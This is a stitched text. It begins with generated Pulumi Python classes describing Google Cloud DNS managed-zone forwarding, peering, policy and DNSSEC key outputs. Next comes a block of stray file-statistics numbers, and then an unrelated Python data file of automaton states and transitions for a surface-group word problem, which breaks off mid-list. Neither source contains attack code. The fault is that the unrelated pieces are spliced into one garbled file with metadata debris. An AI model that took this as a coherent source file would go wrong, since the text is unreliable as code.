:param Sequence['ManagedZoneForwardingConfigTargetNameServerArgs'] target_name_servers: List of target name servers to forward to. Cloud DNS will
select the best available name server if more than
one target is given.
Structure is documented below.
"""
pulumi.set(__self__, "target_name_servers", target_name_servers)
@property
@pulumi.getter(name="targetNameServers")
def target_name_servers(self) -> Sequence['outputs.ManagedZoneForwardingConfigTargetNameServer']:
"""
List of target name servers to forward to. Cloud DNS will
select the best available name server if more than
one target is given.
Structure is documented below.
"""
return pulumi.get(self, "target_name_servers")
@pulumi.output_type
class ManagedZoneForwardingConfigTargetNameServer(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ipv4Address":
suggest = "ipv4_address"
elif key == "forwardingPath":
suggest = "forwarding_path"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZoneForwardingConfigTargetNameServer. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZoneForwardingConfigTargetNameServer.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZoneForwardingConfigTargetNameServer.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ipv4_address: str,
forwarding_path: Optional[str] = None):
"""
:param str ipv4_address: IPv4 address of a target name server.
:param str forwarding_path: Forwarding path for this TargetNameServer. If unset or `default` Cloud DNS will make forwarding
decision based on address ranges, i.e. RFC1918 addresses go to the VPC, Non-RFC1918 addresses go
to the Internet. When set to `private`, Cloud DNS will always send queries through VPC for this target
Possible values are `default` and `private`.
"""
pulumi.set(__self__, "ipv4_address", ipv4_address)
if forwarding_path is not None:
pulumi.set(__self__, "forwarding_path", forwarding_path)
@property
@pulumi.getter(name="ipv4Address")
def ipv4_address(self) -> str:
"""
IPv4 address of a target name server.
"""
return pulumi.get(self, "ipv4_address")
@property
@pulumi.getter(name="forwardingPath")
def forwarding_path(self) -> Optional[str]:
"""
Forwarding path for this TargetNameServer. If unset or `default` Cloud DNS will make forwarding
decision based on address ranges, i.e. RFC1918 addresses go to the VPC, Non-RFC1918 addresses go
to the Internet. When set to `private`, Cloud DNS will always send queries through VPC for this target
Possible values are `default` and `private`.
"""
return pulumi.get(self, "forwarding_path")
@pulumi.output_type
class ManagedZonePeeringConfig(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "targetNetwork":
suggest = "target_network"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZonePeeringConfig. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZonePeeringConfig.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZonePeeringConfig.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
target_network: 'outputs.ManagedZonePeeringConfigTargetNetwork'):
"""
:param 'ManagedZonePeeringConfigTargetNetworkArgs' target_network: The network with which to peer.
Structure is documented below.
"""
pulumi.set(__self__, "target_network", target_network)
@property
@pulumi.getter(name="targetNetwork")
def target_network(self) -> 'outputs.ManagedZonePeeringConfigTargetNetwork':
"""
The network with which to peer.
Structure is documented below.
"""
return pulumi.get(self, "target_network")
@pulumi.output_type
class ManagedZonePeeringConfigTargetNetwork(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkUrl":
suggest = "network_url"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZonePeeringConfigTargetNetwork. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZonePeeringConfigTargetNetwork.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZonePeeringConfigTargetNetwork.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
network_url: str):
"""
:param str network_url: The id or fully qualified URL of the VPC network to forward queries to.
This should be formatted like `projects/{project}/global/networks/{network}` or
`https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
"""
pulumi.set(__self__, "network_url", network_url)
@property
@pulumi.getter(name="networkUrl")
def network_url(self) -> str:
"""
The id or fully qualified URL of the VPC network to forward queries to.
This should be formatted like `projects/{project}/global/networks/{network}` or
`https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
"""
return pulumi.get(self, "network_url")
@pulumi.output_type
class ManagedZonePrivateVisibilityConfig(dict):
def __init__(__self__, *,
networks: Sequence['outputs.ManagedZonePrivateVisibilityConfigNetwork']):
pulumi.set(__self__, "networks", networks)
@property
@pulumi.getter
def networks(self) -> Sequence['outputs.ManagedZonePrivateVisibilityConfigNetwork']:
return pulumi.get(self, "networks")
@pulumi.output_type
class ManagedZonePrivateVisibilityConfigNetwork(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkUrl":
suggest = "network_url"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZonePrivateVisibilityConfigNetwork. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZonePrivateVisibilityConfigNetwork.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZonePrivateVisibilityConfigNetwork.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
network_url: str):
"""
:param str network_url: The id or fully qualified URL of the VPC network to forward queries to.
This should be formatted like `projects/{project}/global/networks/{network}` or
`https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
"""
pulumi.set(__self__, "network_url", network_url)
@property
@pulumi.getter(name="networkUrl")
def network_url(self) -> str:
"""
The id or fully qualified URL of the VPC network to forward queries to.
This should be formatted like `projects/{project}/global/networks/{network}` or
`https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
"""
return pulumi.get(self, "network_url")
@pulumi.output_type
class ManagedZoneServiceDirectoryConfig(dict):
def __init__(__self__, *,
namespace: 'outputs.ManagedZoneServiceDirectoryConfigNamespace'):
"""
:param 'ManagedZoneServiceDirectoryConfigNamespaceArgs' namespace: The namespace associated with the zone.
Structure is documented below.
"""
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def namespace(self) -> 'outputs.ManagedZoneServiceDirectoryConfigNamespace':
"""
The namespace associated with the zone.
Structure is documented below.
"""
return pulumi.get(self, "namespace")
@pulumi.output_type
class ManagedZoneServiceDirectoryConfigNamespace(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "namespaceUrl":
suggest = "namespace_url"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZoneServiceDirectoryConfigNamespace. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZoneServiceDirectoryConfigNamespace.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZoneServiceDirectoryConfigNamespace.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
namespace_url: str):
"""
:param str namespace_url: The fully qualified or partial URL of the service directory namespace that should be
associated with the zone. This should be formatted like
`https://servicedirectory.googleapis.com/v1/projects/{project}/locations/{location}/namespaces/{namespace_id}`
or simply `projects/{project}/locations/{location}/namespaces/{namespace_id}`
Ignored for `public` visibility zones.
"""
pulumi.set(__self__, "namespace_url", namespace_url)
@property
@pulumi.getter(name="namespaceUrl")
def namespace_url(self) -> str:
"""
The fully qualified or partial URL of the service directory namespace that should be
associated with the zone. This should be formatted like
`https://servicedirectory.googleapis.com/v1/projects/{project}/locations/{location}/namespaces/{namespace_id}`
or simply `projects/{project}/locations/{location}/namespaces/{namespace_id}`
Ignored for `public` visibility zones.
"""
return pulumi.get(self, "namespace_url")
@pulumi.output_type
class PolicyAlternativeNameServerConfig(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "targetNameServers":
suggest = "target_name_servers"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PolicyAlternativeNameServerConfig. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PolicyAlternativeNameServerConfig.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PolicyAlternativeNameServerConfig.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
target_name_servers: Sequence['outputs.PolicyAlternativeNameServerConfigTargetNameServer']):
"""
:param Sequence['PolicyAlternativeNameServerConfigTargetNameServerArgs'] target_name_servers: Sets an alternative name server for the associated networks. When specified,
all DNS queries are forwarded to a name server that you choose. Names such as .internal
are not available when an alternative name server is specified.
Structure is documented below.
"""
pulumi.set(__self__, "target_name_servers", target_name_servers)
@property
@pulumi.getter(name="targetNameServers")
def target_name_servers(self) -> Sequence['outputs.PolicyAlternativeNameServerConfigTargetNameServer']:
"""
Sets an alternative name server for the associated networks. When specified,
all DNS queries are forwarded to a name server that you choose. Names such as .internal
are not available when an alternative name server is specified.
Structure is documented below.
"""
return pulumi.get(self, "target_name_servers")
@pulumi.output_type
class PolicyAlternativeNameServerConfigTargetNameServer(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ipv4Address":
suggest = "ipv4_address"
elif key == "forwardingPath":
suggest = "forwarding_path"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PolicyAlternativeNameServerConfigTargetNameServer. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PolicyAlternativeNameServerConfigTargetNameServer.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PolicyAlternativeNameServerConfigTargetNameServer.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ipv4_address: str,
forwarding_path: Optional[str] = None):
"""
:param str ipv4_address: IPv4 address to forward to.
:param str forwarding_path: Forwarding path for this TargetNameServer. If unset or `default` Cloud DNS will make forwarding
decision based on address ranges, i.e. RFC1918 addresses go to the VPC, Non-RFC1918 addresses go
to the Internet. When set to `private`, Cloud DNS will always send queries through VPC for this target
Possible values are `default` and `private`.
"""
pulumi.set(__self__, "ipv4_address", ipv4_address)
if forwarding_path is not None:
pulumi.set(__self__, "forwarding_path", forwarding_path)
@property
@pulumi.getter(name="ipv4Address")
def ipv4_address(self) -> str:
"""
IPv4 address to forward to.
"""
return pulumi.get(self, "ipv4_address")
@property
@pulumi.getter(name="forwardingPath")
def forwarding_path(self) -> Optional[str]:
"""
Forwarding path for this TargetNameServer. If unset or `default` Cloud DNS will make forwarding
decision based on address ranges, i.e. RFC1918 addresses go to the VPC, Non-RFC1918 addresses go
to the Internet. When set to `private`, Cloud DNS will always send queries through VPC for this target
Possible values are `default` and `private`.
"""
return pulumi.get(self, "forwarding_path")
@pulumi.output_type
class PolicyNetwork(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkUrl":
suggest = "network_url"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PolicyNetwork. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PolicyNetwork.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PolicyNetwork.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
network_url: str):
"""
:param str network_url: The id or fully qualified URL of the VPC network to forward queries to.
This should be formatted like `projects/{project}/global/networks/{network}` or
`https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
"""
pulumi.set(__self__, "network_url", network_url)
@property
@pulumi.getter(name="networkUrl")
def network_url(self) -> str:
"""
The id or fully qualified URL of the VPC network to forward queries to.
This should be formatted like `projects/{project}/global/networks/{network}` or
`https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
"""
return pulumi.get(self, "network_url")
@pulumi.output_type
class GetKeysKeySigningKeyResult(dict):
def __init__(__self__, *,
algorithm: str,
creation_time: str,
description: str,
digests: Sequence['outputs.GetKeysKeySigningKeyDigestResult'],
ds_record: str,
id: str,
is_active: bool,
key_length: int,
key_tag: int,
public_key: str):
"""
:param str algorithm: String mnemonic specifying the DNSSEC algorithm of this key. Immutable after creation time. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
:param str creation_time: The time that this resource was created in the control plane. This is in RFC3339 text format.
:param str description: A mutable string of at most 1024 characters associated with this resource for the user's convenience.
:param Sequence['GetKeysKeySigningKeyDigestArgs'] digests: A list of cryptographic hashes of the DNSKEY resource record associated with this DnsKey. These digests are needed to construct a DS record that points at this DNS key. Each contains:
:param str ds_record: The DS record based on the KSK record. This is used when [delegating](https://cloud.google.com/dns/docs/dnssec-advanced#subdelegation) DNSSEC-signed subdomains.
:param str id: Unique identifier for the resource; defined by the server.
:param bool is_active: Active keys will be used to sign subsequent changes to the ManagedZone. Inactive keys will still be present as DNSKEY Resource Records for the use of resolvers validating existing signatures.
:param int key_length: Length of the key in bits. Specified at creation time then immutable.
:param int key_tag: The key tag is a non-cryptographic hash of the a DNSKEY resource record associated with this DnsKey. The key tag can be used to identify a DNSKEY more quickly (but it is not a unique identifier). In particular, the key tag is used in a parent zone's DS record to point at the DNSKEY in this child ManagedZone. The key tag is a number in the range [0, 65535] and the algorithm to calculate it is specified in RFC4034 Appendix B.
:param str public_key: Base64 encoded public half of this key.
"""
pulumi.set(__self__, "algorithm", algorithm)
pulumi.set(__self__, "creation_time", creation_time)
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "digests", digests)
pulumi.set(__self__, "ds_record", ds_record)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "is_active", is_active)
pulumi.set(__self__, "key_length", key_length)
pulumi.set(__self__, "key_tag", key_tag)
pulumi.set(__self__, "public_key", public_key)
@property
@pulumi.getter
def algorithm(self) -> str:
"""
String mnemonic specifying the DNSSEC algorithm of this key. Immutable after creation time. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
The time that this resource was created in the control plane. This is in RFC3339 text format.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def description(self) -> str:
"""
A mutable string of at most 1024 characters associated with this resource for the user's convenience.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def digests(self) -> Sequence['outputs.GetKeysKeySigningKeyDigestResult']:
"""
A list of cryptographic hashes of the DNSKEY resource record associated with this DnsKey. These digests are needed to construct a DS record that points at this DNS key. Each contains:
"""
return pulumi.get(self, "digests")
@property
@pulumi.getter(name="dsRecord")
def ds_record(self) -> str:
"""
The DS record based on the KSK record. This is used when [delegating](https://cloud.google.com/dns/docs/dnssec-advanced#subdelegation) DNSSEC-signed subdomains.
"""
return pulumi.get(self, "ds_record")
@property
@pulumi.getter
def id(self) -> str:
"""
Unique identifier for the resource; defined by the server.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isActive")
def is_active(self) -> bool:
"""
Active keys will be used to sign subsequent changes to the ManagedZone. Inactive keys will still be present as DNSKEY Resource Records for the use of resolvers validating existing signatures.
"""
return pulumi.get(self, "is_active")
@property
@pulumi.getter(name="keyLength")
def key_length(self) -> int:
"""
Length of the key in bits. Specified at creation time then immutable.
"""
return pulumi.get(self, "key_length")
@property
@pulumi.getter(name="keyTag")
def key_tag(self) -> int:
"""
The key tag is a non-cryptographic hash of the a DNSKEY resource record associated with this DnsKey. The key tag can be used to identify a DNSKEY more quickly (but it is not a unique identifier). In particular, the key tag is used in a parent zone's DS record to point at the DNSKEY in this child ManagedZone. The key tag is a number in the range [0, 65535] and the algorithm to calculate it is specified in RFC4034 Appendix B.
"""
return pulumi.get(self, "key_tag")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> str:
"""
Base64 encoded public half of this key.
"""
return pulumi.get(self, "public_key")
@pulumi.output_type
class GetKeysKeySigningKeyDigestResult(dict):
def __init__(__self__, *,
digest: Optional[str] = None,
type: Optional[str] = None):
"""
:param str digest: The base-16 encoded bytes of this digest. Suitable for use in a DS resource record.
:param str type: Specifies the algorithm used to calculate this digest. Possible values are `sha1`, `sha256` and `sha384`
"""
if digest is not None:
pulumi.set(__self__, "digest", digest)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def digest(self) -> Optional[str]:
"""
The base-16 encoded bytes of this digest. Suitable for use in a DS resource record.
"""
return pulumi.get(self, "digest")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Specifies the algorithm used to calculate this digest. Possible values are `sha1`, `sha256` and `sha384`
"""
return pulumi.get(self, "type")
@pulumi.output_type
class GetKeysZoneSigningKeyResult(dict):
def __init__(__self__, *,
algorithm: str,
creation_time: str,
description: str,
digests: Sequence['outputs.GetKeysZoneSigningKeyDigestResult'],
id: str,
is_active: bool,
key_length: int,
key_tag: int,
public_key: str):
"""
:param str algorithm: String mnemonic specifying the DNSSEC algorithm of this key. Immutable after creation time. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
:param str creation_time: The time that this resource was created in the control plane. This is in RFC3339 text format.
:param str description: A mutable string of at most 1024 characters associated with this resource for the user's convenience.
:param Sequence['GetKeysZoneSigningKeyDigestArgs'] digests: A list of cryptographic hashes of the DNSKEY resource record associated with this DnsKey. These digests are needed to construct a DS record that points at this DNS key. Each contains:
:param str id: Unique identifier for the resource; defined by the server.
:param bool is_active: Active keys will be used to sign subsequent changes to the ManagedZone. Inactive keys will still be present as DNSKEY Resource Records for the use of resolvers validating existing signatures.
:param int key_length: Length of the key in bits. Specified at creation time then immutable.
:param int key_tag: The key tag is a non-cryptographic hash of the a DNSKEY resource record associated with this DnsKey. The key tag can be used to identify a DNSKEY more quickly (but it is not a unique identifier). In particular, the key tag is used in a parent zone's DS record to point at the DNSKEY in this child ManagedZone. The key tag is a number in the range [0, 65535] and the algorithm to calculate it is specified in RFC4034 Appendix B.
:param str public_key: Base64 encoded public half of this key.
"""
pulumi.set(__self__, "algorithm", algorithm)
pulumi.set(__self__, "creation_time", creation_time)
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "digests", digests)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "is_active", is_active)
pulumi.set(__self__, "key_length", key_length)
pulumi.set(__self__, "key_tag", key_tag)
pulumi.set(__self__, "public_key", public_key)
@property
@pulumi.getter
def algorithm(self) -> str:
"""
String mnemonic specifying the DNSSEC algorithm of this key. Immutable after creation time. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
The time that this resource was created in the control plane. This is in RFC3339 text format.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def description(self) -> str:
"""
A mutable string of at most 1024 characters associated with this resource for the user's convenience.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def digests(self) -> Sequence['outputs.GetKeysZoneSigningKeyDigestResult']:
"""
A list of cryptographic hashes of the DNSKEY resource record associated with this DnsKey. These digests are needed to construct a DS record that points at this DNS key. Each contains:
"""
return pulumi.get(self, "digests")
@property
@pulumi.getter
def id(self) -> str:
"""
Unique identifier for the resource; defined by the server.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isActive")
def is_active(self) -> bool:
"""
Active keys will be used to sign subsequent changes to the ManagedZone. Inactive keys will still be present as DNSKEY Resource Records for the use of resolvers validating existing signatures.
"""
return pulumi.get(self, "is_active")
@property
@pulumi.getter(name="keyLength")
def key_length(self) -> int:
"""
Length of the key in bits. Specified at creation time then immutable.
"""
return pulumi.get(self, "key_length")
@property
@pulumi.getter(name="keyTag")
def key_tag(self) -> int:
"""
The key tag is a non-cryptographic hash of the a DNSKEY resource record associated with this DnsKey. The key tag can be used to identify a DNSKEY more quickly (but it is not a unique identifier). In particular, the key tag is used in a parent zone's DS record to point at the DNSKEY in this child ManagedZone. The key tag is a number in the range [0, 65535] and the algorithm to calculate it is specified in RFC4034 Appendix B.
"""
return pulumi.get(self, "key_tag")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> str:
"""
Base64 encoded public half of this key.
"""
return pulumi.get(self, "public_key")
@pulumi.output_type
class GetKeysZoneSigningKeyDigestResult(dict):
def __init__(__self__, *,
digest: Optional[str] = None,
type: Optional[str] = None):
"""
:param str digest: The base-16 encoded bytes of this digest. Suitable for use in a DS resource record.
:param str type: Specifies the algorithm used to calculate this digest. Possible values are `sha1`, `sha256` and `sha384`
"""
if digest is not None:
pulumi.set(__self__, "digest", digest)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def digest(self) -> Optional[str]:
"""
The base-16 encoded bytes of this digest. Suitable for use in a DS resource record.
"""
return pulumi.get(self, "digest")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Specifies the algorithm used to calculate this digest. Possible values are `sha1`, `sha256` and `sha384`
"""
return pulumi.get(self, "type")
| 42.730853
| 455
| 0.658977
| 4,543
| 39,056
| 5.504512
| 0.077922
| 0.015396
| 0.022874
| 0.033431
| 0.829808
| 0.81985
| 0.813652
| 0.778422
| 0.776143
| 0.774143
| 0
| 0.010102
| 0.25233
| 39,056
| 913
| 456
| 42.777656
| 0.846272
| 0.397045
| 0
| 0.748515
| 1
| 0.021782
| 0.194495
| 0.077845
| 0
| 0
| 0
| 0
| 0
| 1
| 0.186139
| false
| 0
| 0.011881
| 0.00198
| 0.362376
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
df3bace9c584377d65079bfc44f504413f7d133a
| 24,238
|
py
|
Python
|
inputs/s2/s2_gm.py
|
sayantangkhan/word-problem-cuda
|
44aba26c91db399f00161bb2f72ccd0c0e97733f
|
[
"MIT"
] | null | null | null |
inputs/s2/s2_gm.py
|
sayantangkhan/word-problem-cuda
|
44aba26c91db399f00161bb2f72ccd0c0e97733f
|
[
"MIT"
] | null | null | null |
inputs/s2/s2_gm.py
|
sayantangkhan/word-problem-cuda
|
44aba26c91db399f00161bb2f72ccd0c0e97733f
|
[
"MIT"
] | null | null | null |
# States are 0-indexed, and state 0 is reject sink.
# Alphabet is 0-indexed.
from itertools import product
# Data copy pasted from sage output
names = ["g1", "g2", "g3", "g4", "g5", "g6", "g7", "g8", "_"]
state_labels = {
1: "_",
2: "g2",
3: "g1",
4: "g4",
5: "g3",
6: "g6",
7: "g5",
8: "g8",
9: "g7",
}
accepting_states_raw = [
[1, 1],
[2, 1],
[5, 2],
[6, 1],
[9, 3],
[12, 1],
[13, 4],
[15, 1],
[17, 5],
[18, 1],
[21, 6],
[23, 1],
[25, 7],
[28, 1],
[29, 8],
[32, 1],
[33, 9],
[40, 1],
[41, 1],
[43, 1],
[44, 1],
[46, 1],
[50, 1],
[54, 1],
[55, 1],
[58, 1],
[59, 1],
[66, 1],
[67, 1],
[69, 1],
[70, 1],
[72, 1],
[76, 1],
[80, 1],
[81, 1],
[84, 1],
[85, 1],
[88, 1],
[90, 1],
[92, 1],
[95, 1],
[98, 1],
[101, 1],
[104, 1],
]
num_states = 105
initial_state = 1
transitions_raw = [
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[19, 34]],
[[64, 35]],
[],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[24, 36]],
[[33, 37]],
[],
[[3, 38]],
[[48, 39]],
[
[1, 40],
[3, 3],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 41],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[],
[[8, 42]],
[
[1, 43],
[4, 4],
[9, 5],
[11, 44],
[17, 8],
[18, 9],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[17, 45]],
[],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[59, 47]],
[[32, 48]],
[],
[[65, 49]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[71, 50],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
[80, 29],
],
[[56, 51]],
[],
[[43, 52]],
[[16, 53]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 54],
[12, 7],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 55],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[],
[[49, 56]],
[[40, 57]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 58],
[44, 20],
[45, 21],
[49, 22],
[51, 59],
[54, 25],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[80, 29],
],
[],
[[53, 60]],
[[48, 61]],
[[8, 62]],
[[7, 63]],
[[69, 64]],
[[64, 65]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 66],
[72, 33],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[71, 67],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
[80, 29],
],
[[24, 68]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 69],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 70],
[27, 13],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
